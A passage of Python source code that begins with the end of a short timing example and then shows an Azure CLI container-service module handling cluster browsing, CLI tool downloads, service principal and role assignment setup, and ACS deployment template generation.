print(f"Time: {end_time - start_time:.2f}") start_time = time.perf_counter() for _ in range(2): do_work() end_time = time.perf_counter() print(f"Time: {end_time - start_time:.2f}") if __name__ == "__main__": run_example()
custom.py
# -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. # -------------------------------------------------------------------------------------------- from __future__ import print_function import binascii import datetime import errno import json import os import os.path import platform import random import re import shutil import ssl import stat import string import subprocess import sys import tempfile import threading import time import uuid import webbrowser from distutils.version import StrictVersion from math import isnan from six.moves.urllib.request import urlopen # pylint: disable=import-error from six.moves.urllib.error import URLError # pylint: disable=import-error # pylint: disable=import-error import yaml import dateutil.parser from dateutil.relativedelta import relativedelta from knack.log import get_logger from knack.util import CLIError from knack.prompting import prompt_pass, NoTTYException, prompt_y_n from msrestazure.azure_exceptions import CloudError import requests # pylint: disable=no-name-in-module,import-error from azure.cli.command_modules.acs import acs_client, proxy from azure.cli.command_modules.acs._params import regions_in_preview, regions_in_prod from azure.cli.core.api import get_config_dir from azure.cli.core.azclierror import (ResourceNotFoundError, ArgumentUsageError, ClientRequestError, InvalidArgumentValueError, ValidationError) from azure.cli.core._profile import Profile from azure.cli.core.commands.client_factory import get_mgmt_service_client, get_subscription_id from azure.cli.core.keys import is_valid_ssh_rsa_public_key from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, truncate_text, sdk_no_wait from azure.cli.core.commands import LongRunningOperation from azure.graphrbac.models import (ApplicationCreateParameters, ApplicationUpdateParameters, PasswordCredential, KeyCredential, ServicePrincipalCreateParameters, GetObjectsParameters, ResourceAccess, RequiredResourceAccess) from azure.mgmt.containerservice.models import ContainerServiceOrchestratorTypes from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceNetworkProfile from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceLinuxProfile from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterServicePrincipalProfile from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceSshConfiguration from azure.mgmt.containerservice.v2020_09_01.models import ContainerServiceSshPublicKey from azure.mgmt.containerservice.v2020_09_01.models import ManagedCluster from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterAADProfile from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterAddonProfile from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterAgentPoolProfile from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterIdentity from azure.mgmt.containerservice.v2020_09_01.models import AgentPool from azure.mgmt.containerservice.v2020_09_01.models import AgentPoolUpgradeSettings from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterSKU from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterWindowsProfile from azure.mgmt.containerservice.v2020_09_01.models import ManagedClusterIdentityUserAssignedIdentitiesValue from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAgentPoolProfile from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftAgentPoolProfileRole from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterIdentityProvider from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAADIdentityProvider from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedCluster from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftRouterProfile from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterAuthProfile from azure.mgmt.containerservice.v2019_09_30_preview.models import NetworkProfile from azure.mgmt.containerservice.v2019_09_30_preview.models import OpenShiftManagedClusterMonitorProfile from ._client_factory import cf_container_services from ._client_factory import cf_resource_groups from ._client_factory import get_auth_management_client from ._client_factory import get_graph_rbac_management_client from ._client_factory import cf_resources from ._client_factory import get_resource_by_name from ._client_factory import cf_container_registry_service from ._client_factory import cf_managed_clusters from ._client_factory import get_msi_client from ._helpers import (_populate_api_server_access_profile, _set_vm_set_type, _set_outbound_type, _parse_comma_separated_list) from ._loadbalancer import (set_load_balancer_sku, is_load_balancer_profile_provided, update_load_balancer_profile, create_load_balancer_profile) from ._consts import CONST_SCALE_SET_PRIORITY_REGULAR, CONST_SCALE_SET_PRIORITY_SPOT, CONST_SPOT_EVICTION_POLICY_DELETE from ._consts import CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME from ._consts import CONST_MONITORING_ADDON_NAME from ._consts import CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID from ._consts import CONST_VIRTUAL_NODE_ADDON_NAME from ._consts import CONST_VIRTUAL_NODE_SUBNET_NAME from ._consts import CONST_KUBE_DASHBOARD_ADDON_NAME from ._consts import CONST_AZURE_POLICY_ADDON_NAME from ._consts import CONST_INGRESS_APPGW_ADDON_NAME from ._consts import CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID, CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME from ._consts import CONST_INGRESS_APPGW_SUBNET_CIDR, CONST_INGRESS_APPGW_SUBNET_ID from ._consts import CONST_INGRESS_APPGW_WATCH_NAMESPACE from ._consts import CONST_CONFCOM_ADDON_NAME, CONST_ACC_SGX_QUOTE_HELPER_ENABLED from ._consts import ADDONS from ._consts import CONST_CANIPULL_IMAGE logger = get_logger(__name__) # pylint:disable=too-many-lines,unused-argument def which(binary): path_var = os.getenv('PATH') if platform.system() == 'Windows': binary = binary + '.exe' parts = path_var.split(';') else: parts = path_var.split(':') for part in parts: bin_path = os.path.join(part, binary) if os.path.exists(bin_path) and os.path.isfile(bin_path) and os.access(bin_path, os.X_OK): return bin_path return None def wait_then_open(url): """ Waits for a bit then opens a URL. Useful for waiting for a proxy to come up, and then open the URL. """ for _ in range(1, 10): try: urlopen(url, context=_ssl_context()) except URLError: time.sleep(1) break webbrowser.open_new_tab(url) def wait_then_open_async(url): """ Spawns a thread that waits for a bit then opens a URL. """ t = threading.Thread(target=wait_then_open, args=({url})) t.daemon = True t.start() def acs_browse(cmd, client, resource_group_name, name, disable_browser=False, ssh_key_file=None): """ Opens a browser to the web interface for the cluster orchestrator :param name: Name of the target Azure container service instance. :type name: String :param resource_group_name: Name of Azure container service's resource group. :type resource_group_name: String :param disable_browser: If true, don't launch a web browser after estabilishing the proxy :type disable_browser: bool :param ssh_key_file: If set a path to an SSH key to use, only applies to DCOS :type ssh_key_file: string """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name) _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file) def _acs_browse_internal(cmd, client, acs_info, resource_group_name, name, disable_browser, ssh_key_file): orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member if str(orchestrator_type).lower() == 'kubernetes' or \ orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes or \ (acs_info.custom_profile and acs_info.custom_profile.orchestrator == 'kubernetes'): # pylint: disable=no-member return k8s_browse(cmd, client, name, resource_group_name, disable_browser, ssh_key_file=ssh_key_file) if str(orchestrator_type).lower() == 'dcos' or orchestrator_type == ContainerServiceOrchestratorTypes.dcos: return _dcos_browse_internal(acs_info, disable_browser, ssh_key_file) raise CLIError('Unsupported orchestrator type {} for browse'.format(orchestrator_type)) def k8s_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None): """ Launch a proxy and browse the Kubernetes web UI. :param disable_browser: If true, don't launch a web browser after estabilishing the proxy :type disable_browser: bool """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name) _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file) def _k8s_browse_internal(name, acs_info, disable_browser, ssh_key_file): if not which('kubectl'): raise CLIError('Can not find kubectl executable in PATH') browse_path = os.path.join(get_config_dir(), 'acsBrowseConfig.yaml') if os.path.exists(browse_path): os.remove(browse_path) _k8s_get_credentials_internal(name, acs_info, browse_path, ssh_key_file, False) logger.warning('Proxy running on 127.0.0.1:8001/ui') logger.warning('Press CTRL+C to close the tunnel...') if not disable_browser: wait_then_open_async('http://127.0.0.1:8001/ui') subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy"]) def dcos_browse(cmd, client, name, resource_group_name, disable_browser=False, ssh_key_file=None): """ Creates an SSH tunnel to the Azure container service, and opens the Mesosphere DC/OS dashboard in the browser. :param name: name: Name of the target Azure container service instance. :type name: String :param resource_group_name: Name of Azure container service's resource group. :type resource_group_name: String :param disable_browser: If true, don't launch a web browser after estabilishing the proxy :type disable_browser: bool :param ssh_key_file: Path to the SSH key to use :type ssh_key_file: string """ acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name) _dcos_browse_internal(acs_info, disable_browser, ssh_key_file) def _dcos_browse_internal(acs_info, disable_browser, ssh_key_file): if not os.path.isfile(ssh_key_file): raise CLIError('Private key file {} does not exist'.format(ssh_key_file)) acs = acs_client.ACSClient() if not acs.connect(_get_host_name(acs_info), _get_username(acs_info), key_filename=ssh_key_file): raise CLIError('Error connecting to ACS: {}'.format(_get_host_name(acs_info))) octarine_bin = '/opt/mesosphere/bin/octarine' if not acs.file_exists(octarine_bin): raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(octarine_bin)) proxy_id = _rand_str(16) proxy_cmd = '{} {}'.format(octarine_bin, proxy_id) acs.run(proxy_cmd, background=True) # Parse the output to get the remote PORT proxy_client_cmd = '{} --client --port {}'.format(octarine_bin, proxy_id) stdout, _ = acs.run(proxy_client_cmd) remote_port = int(stdout.read().decode().strip()) local_port = acs.get_available_local_port() # Set the proxy proxy.set_http_proxy('127.0.0.1', local_port) logger.warning('Proxy running on 127.0.0.1:%s', local_port) logger.warning('Press CTRL+C to close the tunnel...') if not disable_browser: wait_then_open_async('http://127.0.0.1') try: acs.create_tunnel( remote_host='127.0.0.1', remote_port=remote_port, local_port=local_port) finally: proxy.disable_http_proxy() def acs_install_cli(cmd, client, resource_group_name, name, install_location=None, client_version=None): acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name) orchestrator_type = acs_info.orchestrator_profile.orchestrator_type # pylint: disable=no-member kwargs = {'install_location': install_location} if client_version: kwargs['client_version'] = client_version if orchestrator_type == 'kubernetes': return k8s_install_cli(**kwargs) if orchestrator_type == 'dcos': return dcos_install_cli(**kwargs) raise CLIError('Unsupported orchestrator type {} for install-cli'.format(orchestrator_type)) def _ssl_context(): if sys.version_info < (3, 4) or (in_cloud_console() and platform.system() == 'Windows'): try: return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6 except AttributeError: return ssl.SSLContext(ssl.PROTOCOL_TLSv1) return ssl.create_default_context() def _urlretrieve(url, filename): req = urlopen(url, context=_ssl_context()) with open(filename, "wb") as f: f.write(req.read()) def _unzip(src, dest): logger.debug('Extracting %s to %s.', src, dest) system = platform.system() if system in ('Linux', 'Darwin', 'Windows'): import zipfile with zipfile.ZipFile(src, 'r') as zipObj: zipObj.extractall(dest) else: raise CLIError('The current system is not supported.') def dcos_install_cli(cmd, install_location=None, client_version='1.8'): """ Downloads the dcos command line from Mesosphere """ system = platform.system() if not install_location: raise CLIError( "No install location specified and it could not be determined from the current platform '{}'".format( system)) base_url = 'https://downloads.dcos.io/binaries/cli/{}/x86-64/dcos-{}/{}' if system == 'Windows': file_url = base_url.format('windows', client_version, 'dcos.exe') elif system == 'Linux': # TODO Support ARM CPU here file_url = base_url.format('linux', client_version, 'dcos') elif system == 'Darwin': file_url = base_url.format('darwin', client_version, 'dcos') else: raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system)) logger.warning('Downloading client to %s', install_location) try: _urlretrieve(file_url, install_location) os.chmod(install_location, os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH) except IOError as err: raise CLIError('Connection error while attempting to download client ({})'.format(err)) def k8s_install_cli(cmd, client_version='latest', install_location=None, base_src_url=None, kubelogin_version='latest', kubelogin_install_location=None, kubelogin_base_src_url=None): k8s_install_kubectl(cmd, client_version, install_location, base_src_url) k8s_install_kubelogin(cmd, kubelogin_version, kubelogin_install_location, kubelogin_base_src_url) def k8s_install_kubectl(cmd, client_version='latest', install_location=None, source_url=None): """ Install kubectl, a command-line interface for Kubernetes clusters. """ if not source_url: source_url = "https://storage.googleapis.com/kubernetes-release/release" cloud_name = cmd.cli_ctx.cloud.name if cloud_name.lower() == 'azurechinacloud': source_url = 'https://mirror.azure.cn/kubernetes/kubectl' if client_version == 'latest': context = _ssl_context() version = urlopen(source_url + '/stable.txt', context=context).read() client_version = version.decode('UTF-8').strip() else: client_version = "v%s" % client_version file_url = '' system = platform.system() base_url = source_url + '/{}/bin/{}/amd64/{}' # ensure installation directory exists install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location) if not os.path.exists(install_dir): os.makedirs(install_dir) if system == 'Windows': file_url = base_url.format(client_version, 'windows', 'kubectl.exe') elif system == 'Linux': # TODO: Support ARM CPU here file_url = base_url.format(client_version, 'linux', 'kubectl') elif system == 'Darwin': file_url = base_url.format(client_version, 'darwin', 'kubectl') else: raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system)) logger.warning('Downloading client to "%s" from "%s"', install_location, file_url) try: _urlretrieve(file_url, install_location) os.chmod(install_location, os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH) except IOError as ex: raise CLIError('Connection error while attempting to download client ({})'.format(ex)) if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs env_paths = os.environ['PATH'].split(';') found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None) if not found: # pylint: disable=logging-format-interpolation logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n' ' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. ' 'This is good for the current command session.\n' ' 2. Update system PATH environment variable by following ' '"Control Panel->System->Advanced->Environment Variables", and re-open the command window. ' 'You only need to do it once'.format(install_dir, cli)) else: logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.', install_dir, cli) def k8s_install_kubelogin(cmd, client_version='latest', install_location=None, source_url=None): """ Install kubelogin, a client-go credential (exec) plugin implementing azure authentication. """ cloud_name = cmd.cli_ctx.cloud.name if not source_url: source_url = 'https://github.com/Azure/kubelogin/releases/download' if cloud_name.lower() == 'azurechinacloud': source_url = 'https://mirror.azure.cn/kubernetes/kubelogin' if client_version == 'latest': context = _ssl_context() latest_release_url = 'https://api.github.com/repos/Azure/kubelogin/releases/latest' if cloud_name.lower() == 'azurechinacloud': latest_release_url = 'https://mirror.azure.cn/kubernetes/kubelogin/latest' latest_release = urlopen(latest_release_url, context=context).read() client_version = json.loads(latest_release)['tag_name'].strip() else: client_version = "v%s" % client_version base_url = source_url + '/{}/kubelogin.zip' file_url = base_url.format(client_version) # ensure installation directory exists install_dir, cli = os.path.dirname(install_location), os.path.basename(install_location) if not os.path.exists(install_dir): os.makedirs(install_dir) system = platform.system() if system == 'Windows': sub_dir, binary_name = 'windows_amd64', 'kubelogin.exe' elif system == 'Linux': # TODO: Support ARM CPU here sub_dir, binary_name = 'linux_amd64', 'kubelogin' elif system == 'Darwin': sub_dir, binary_name = 'darwin_amd64', 'kubelogin' else: raise CLIError('Proxy server ({}) does not exist on the cluster.'.format(system)) with tempfile.TemporaryDirectory() as tmp_dir: try: download_path = os.path.join(tmp_dir, 'kubelogin.zip') logger.warning('Downloading client to "%s" from "%s"', download_path, file_url) _urlretrieve(file_url, download_path) except IOError as ex: raise CLIError('Connection error while attempting to download client ({})'.format(ex)) _unzip(download_path, tmp_dir) download_path = os.path.join(tmp_dir, 'bin', sub_dir, binary_name) shutil.move(download_path, install_location) os.chmod(install_location, os.stat(install_location).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH) if system == 'Windows': # be verbose, as the install_location likely not in Windows's search PATHs env_paths = os.environ['PATH'].split(';') found = next((x for x in env_paths if x.lower().rstrip('\\') == install_dir.lower()), None) if not found: # pylint: disable=logging-format-interpolation logger.warning('Please add "{0}" to your search PATH so the `{1}` can be found. 2 options: \n' ' 1. Run "set PATH=%PATH%;{0}" or "$env:path += \'{0}\'" for PowerShell. ' 'This is good for the current command session.\n' ' 2. Update system PATH environment variable by following ' '"Control Panel->System->Advanced->Environment Variables", and re-open the command window. ' 'You only need to do it once'.format(install_dir, cli)) else: logger.warning('Please ensure that %s is in your search PATH, so the `%s` command can be found.', install_dir, cli) def _build_service_principal(rbac_client, cli_ctx, name, url, client_secret): # use get_progress_controller hook = cli_ctx.get_progress_controller(True) hook.add(messsage='Creating service principal', value=0, total_val=1.0) logger.info('Creating service principal') # always create application with 5 years expiration start_date = datetime.datetime.utcnow() end_date = start_date + relativedelta(years=5) result, aad_session_key = create_application(rbac_client.applications, name, url, [url], password=client_secret, start_date=start_date, end_date=end_date) service_principal = result.app_id # pylint: disable=no-member for x in range(0, 10): hook.add(message='Creating service principal', value=0.1 * x, total_val=1.0) try: create_service_principal(cli_ctx, service_principal, rbac_client=rbac_client) break # TODO figure out what exception AAD throws here sometimes. except Exception as ex: # pylint: disable=broad-except logger.info(ex) time.sleep(2 + 2 * x) else: return False, aad_session_key hook.add(message='Finished service principal creation', value=1.0, total_val=1.0) logger.info('Finished service principal creation') return service_principal, aad_session_key def _add_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal=True, delay=2, scope=None): # AAD can have delays in propagating data, so sleep and retry hook = cli_ctx.get_progress_controller(True) hook.add(message='Waiting for AAD role to propagate', value=0, total_val=1.0) logger.info('Waiting for AAD role to propagate') for x in range(0, 10): hook.add(message='Waiting for AAD role to propagate', value=0.1 * x, total_val=1.0) try: # TODO: break this out into a shared utility library create_role_assignment(cli_ctx, role, service_principal_msi_id, is_service_principal, scope=scope) break except CloudError as ex: if ex.message == 'The role assignment already exists.': break logger.info(ex.message) except: # pylint: disable=bare-except pass time.sleep(delay + delay * x) else: return False hook.add(message='AAD role propagation done', value=1.0, total_val=1.0) logger.info('AAD role propagation done') return True def delete_role_assignments(cli_ctx, ids=None, assignee=None, role=None, resource_group_name=None, scope=None, include_inherited=False, yes=None): factory = get_auth_management_client(cli_ctx, scope) assignments_client = factory.role_assignments definitions_client = factory.role_definitions ids = ids or [] if ids: if assignee or role or resource_group_name or scope or include_inherited: raise CLIError('When assignment ids are used, other parameter values are not required') for i in ids: assignments_client.delete_by_id(i) return if not any([ids, assignee, role, resource_group_name, scope, assignee, yes]): msg = 'This will delete all role assignments under the subscription. Are you sure?' if not prompt_y_n(msg, default="n"): return scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id) assignments = _search_role_assignments(cli_ctx, assignments_client, definitions_client, scope, assignee, role, include_inherited, include_groups=False) if assignments: for a in assignments: assignments_client.delete_by_id(a.id) def _delete_role_assignments(cli_ctx, role, service_principal, delay=2, scope=None): # AAD can have delays in propagating data, so sleep and retry hook = cli_ctx.get_progress_controller(True) hook.add(message='Waiting for AAD role to delete', value=0, total_val=1.0) logger.info('Waiting for AAD role to delete') for x in range(0, 10): hook.add(message='Waiting for AAD role to delete', value=0.1 * x, total_val=1.0) try: delete_role_assignments(cli_ctx, role=role, assignee=service_principal, scope=scope) break except CLIError as ex: raise ex except CloudError as ex: logger.info(ex) time.sleep(delay + delay * x) else: return False hook.add(message='AAD role deletion done', value=1.0, total_val=1.0) logger.info('AAD role deletion done') return True def _search_role_assignments(cli_ctx, assignments_client, definitions_client, scope, assignee, role, include_inherited, include_groups): assignee_object_id = None if assignee: assignee_object_id = _resolve_object_id(cli_ctx, assignee) # always use "scope" if provided, so we can get assignments beyond subscription e.g. management groups if scope: assignments = list(assignments_client.list_for_scope( scope=scope, filter='atScope()')) elif assignee_object_id: if include_groups: f = "assignedTo('{}')".format(assignee_object_id) else: f = "principalId eq '{}'".format(assignee_object_id) assignments = list(assignments_client.list(filter=f)) else: assignments = list(assignments_client.list()) if assignments: assignments = [a for a in assignments if ( not scope or include_inherited and re.match(_get_role_property(a, 'scope'), scope, re.I) or _get_role_property(a, 'scope').lower() == scope.lower() )] if role: role_id = _resolve_role_id(role, scope, definitions_client) assignments = [i for i in assignments if _get_role_property( i, 'role_definition_id') == role_id] if assignee_object_id: assignments = [i for i in assignments if _get_role_property( i, 'principal_id') == assignee_object_id] return assignments def _get_role_property(obj, property_name): if isinstance(obj, dict): return obj[property_name] return getattr(obj, property_name) def _get_default_dns_prefix(name, resource_group_name, subscription_id): # Use subscription id to provide uniqueness and prevent DNS name clashes name_part = re.sub('[^A-Za-z0-9-]', '', name)[0:10] if not name_part[0].isalpha(): name_part = (str('a') + name_part)[0:10] resource_group_part = re.sub('[^A-Za-z0-9-]', '', resource_group_name)[0:16] return '{}-{}-{}'.format(name_part, resource_group_part, subscription_id[0:6]) def list_acs_locations(cmd, client): return { "productionRegions": regions_in_prod, "previewRegions": regions_in_preview } def _generate_windows_profile(windows, admin_username, admin_password): if windows: if not admin_password: raise CLIError('--admin-password is required.') if len(admin_password) < 6: raise CLIError('--admin-password must be at least 6 characters') windows_profile = { "adminUsername": admin_username, "adminPassword": admin_password, } return windows_profile return None def _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix, master_vm_size, master_osdisk_size, master_vnet_subnet_id, master_first_consecutive_static_ip, master_storage_profile): master_pool_profile = {} default_master_pool_profile = { "count": int(master_count), "dnsPrefix": dns_name_prefix + 'mgmt', } if api_version == "2017-07-01": default_master_pool_profile = _update_dict(default_master_pool_profile, { "count": int(master_count), "dnsPrefix": dns_name_prefix + 'mgmt', "vmSize": master_vm_size, "osDiskSizeGB": int(master_osdisk_size), "vnetSubnetID": master_vnet_subnet_id, "firstConsecutiveStaticIP": master_first_consecutive_static_ip, "storageProfile": master_storage_profile, }) if not master_profile: master_pool_profile = default_master_pool_profile else: master_pool_profile = _update_dict(default_master_pool_profile, master_profile) return master_pool_profile def _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix, agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id, agent_ports, agent_storage_profile): agent_pool_profiles = [] default_agent_pool_profile = { "count": int(agent_count), "vmSize": agent_vm_size, "osType": os_type, "dnsPrefix": dns_name_prefix + 'agent', } if api_version == "2017-07-01": default_agent_pool_profile = _update_dict(default_agent_pool_profile, { "count": int(agent_count), "vmSize": agent_vm_size, "osDiskSizeGB": int(agent_osdisk_size), "osType": os_type, "dnsPrefix": dns_name_prefix + 'agent', "vnetSubnetID": agent_vnet_subnet_id, "ports": agent_ports, "storageProfile": agent_storage_profile, }) if agent_profiles is None: agent_pool_profiles.append(_update_dict(default_agent_pool_profile, {"name": "agentpool0"})) else: # override agentPoolProfiles by using the passed in agent_profiles for idx, ap in enumerate(agent_profiles): # if the user specified dnsPrefix, we honor that # otherwise, we use the idx to avoid duplicate dns name a = _update_dict({"dnsPrefix": dns_name_prefix + 'agent' + str(idx)}, ap) agent_pool_profiles.append(_update_dict(default_agent_pool_profile, a)) return agent_pool_profiles def _generate_outputs(name, orchestrator_type, admin_username): # define outputs outputs = { "masterFQDN": { "type": "string", "value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).masterProfile.fqdn]".format(name) # pylint: disable=line-too-long }, "sshMaster0": { "type": "string", "value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 22')]".format(admin_username, name) # pylint: disable=line-too-long }, } if orchestrator_type.lower() != "kubernetes": outputs["agentFQDN"] = { "type": "string", "value": "[reference(concat('Microsoft.ContainerService/containerServices/', '{}')).agentPoolProfiles[0].fqdn]".format(name) # pylint: disable=line-too-long } # override sshMaster0 for non-kubernetes scenarios outputs["sshMaster0"] = { "type": "string", "value": "[concat('ssh ', '{0}', '@', reference(concat('Microsoft.ContainerService/containerServices/', '{1}')).masterProfile.fqdn, ' -A -p 2200')]".format(admin_username, name) # pylint: disable=line-too-long } return outputs def _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile, agent_pool_profiles, ssh_key_value, admin_username, windows_profile): properties = { "orchestratorProfile": { "orchestratorType": orchestrator_type, }, "masterProfile": master_pool_profile, "agentPoolProfiles": agent_pool_profiles, "linuxProfile": { "ssh": { "publicKeys": [ { "keyData": ssh_key_value } ] }, "adminUsername": admin_username }, } if api_version == "2017-07-01": properties["orchestratorProfile"]["orchestratorVersion"] = orchestrator_version if windows_profile is not None: properties["windowsProfile"] = windows_profile return properties def _get_user_assigned_identity_client_id(cli_ctx, resource_id): msi_client = get_msi_client(cli_ctx) pattern = '/subscriptions/.*?/resourcegroups/(.*?)/providers/microsoft.managedidentity/userassignedidentities/(.*)' resource_id = resource_id.lower() match = re.search(pattern, resource_id) if match: resource_group_name = match.group(1) identity_name = match.group(2) try: identity = msi_client.user_assigned_identities.get(resource_group_name=resource_group_name, resource_name=identity_name) except CloudError as ex: if 'was not found' in ex.message: raise ResourceNotFoundError("Identity {} not found.".format(resource_id)) raise ClientRequestError(ex.message) return identity.client_id raise InvalidArgumentValueError("Cannot parse identity name from provided resource id {}.".format(resource_id)) # pylint: disable=too-many-locals def acs_create(cmd, client, resource_group_name, deployment_name, name, ssh_key_value, dns_name_prefix=None, location=None, admin_username="azureuser", api_version=None, master_profile=None, master_vm_size="Standard_D2_v2", master_osdisk_size=0, master_count=1, master_vnet_subnet_id="", master_first_consecutive_static_ip="10.240.255.5", master_storage_profile="", agent_profiles=None, agent_vm_size="Standard_D2_v2", agent_osdisk_size=0, agent_count=3, agent_vnet_subnet_id="", agent_ports=None, agent_storage_profile="", orchestrator_type="DCOS", orchestrator_version="", service_principal=None, client_secret=None, tags=None, windows=False, admin_password="", generate_ssh_keys=False, # pylint: disable=unused-argument validate=False, no_wait=False): """Create a new Acs. :param resource_group_name: The name of the resource group. The name is case insensitive. :type resource_group_name: str :param deployment_name: The name of the deployment. :type deployment_name: str :param dns_name_prefix: Sets the Domain name prefix for the cluster. The concatenation of the domain name and the regionalized DNS zone make up the fully qualified domain name associated with the public IP address. :type dns_name_prefix: str :param name: Resource name for the container service. :type name: str :param ssh_key_value: Configure all linux machines with the SSH RSA public key string. Your key should include three parts, for example 'ssh-rsa AAAAB...snip...UcyupgH azureuser@linuxvm :type ssh_key_value: str :param content_version: If included it must match the ContentVersion in the template. :type content_version: str :param admin_username: User name for the Linux Virtual Machines. :type admin_username: str :param api_version: ACS API version to use :type api_version: str :param master_profile: MasterProfile used to describe master pool :type master_profile: dict :param master_vm_size: The size of master pool Virtual Machine :type master_vm_size: str :param master_osdisk_size: The osDisk size in GB of master pool Virtual Machine :type master_osdisk_size: int :param master_count: The number of masters for the cluster. :type master_count: int :param master_vnet_subnet_id: The vnet subnet id for master pool :type master_vnet_subnet_id: str :param master_storage_profile: The storage profile used for master pool. Possible value could be StorageAccount, ManagedDisk. :type master_storage_profile: str :param agent_profiles: AgentPoolProfiles used to describe agent pools :type agent_profiles: dict :param agent_vm_size: The size of the Virtual Machine. :type agent_vm_size: str :param agent_osdisk_size: The osDisk size in GB of agent pool Virtual Machine :type agent_osdisk_size: int :param agent_vnet_subnet_id: The vnet subnet id for master pool :type agent_vnet_subnet_id: str :param agent_ports: the ports exposed on the agent pool :type agent_ports: list :param agent_storage_profile: The storage profile used for agent pool. Possible value could be StorageAccount, ManagedDisk. :type agent_storage_profile: str :param location: Location for VM resources. :type location: str :param orchestrator_type: The type of orchestrator used to manage the applications on the cluster. :type orchestrator_type: str or :class:`orchestratorType <Default.models.orchestratorType>` :param tags: Tags object. :type tags: object :param windows: If true, the cluster will be built for running Windows container. :type windows: bool :param admin_password: The adminstration password for Windows nodes. Only available if --windows=true :type admin_password: str :param bool raw: returns the direct response alongside the deserialized response :rtype: :class:`AzureOperationPoller<msrestazure.azure_operation.AzureOperationPoller>` instance that returns :class:`DeploymentExtended <Default.models.DeploymentExtended>` :rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>` if raw=true :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>` """ if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value): raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value)) subscription_id = get_subscription_id(cmd.cli_ctx) if not dns_name_prefix: dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id) rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name) if location is None: location = rg_location # if api-version is not specified, or specified in a version not supported # override based on location if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]: if location in regions_in_preview: api_version = "2017-07-01" # 2017-07-01 supported in the preview locations else: api_version = "2017-01-31" # 2017-01-31 applied to other locations if orchestrator_type.lower() == 'kubernetes': principal_obj = _ensure_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id, dns_name_prefix, location, name) client_secret = principal_obj.get("client_secret") service_principal = principal_obj.get("service_principal") elif windows: raise CLIError('--windows is only supported for Kubernetes clusters') # set location if void if not location: location = '[resourceGroup().location]' # set os_type os_type = 'Linux' if windows: os_type = 'Windows' # set agent_ports if void if not agent_ports: agent_ports = [] # get windows_profile windows_profile = _generate_windows_profile(windows, admin_username, admin_password) # The resources.properties fields should match with ContainerServices' api model master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix, master_vm_size, master_osdisk_size, master_vnet_subnet_id, master_first_consecutive_static_ip, master_storage_profile) agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix, agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id, agent_ports, agent_storage_profile) outputs = _generate_outputs(name, orchestrator_type, admin_username) properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile, agent_pool_profiles, ssh_key_value, admin_username, windows_profile) resource = { "apiVersion": api_version, 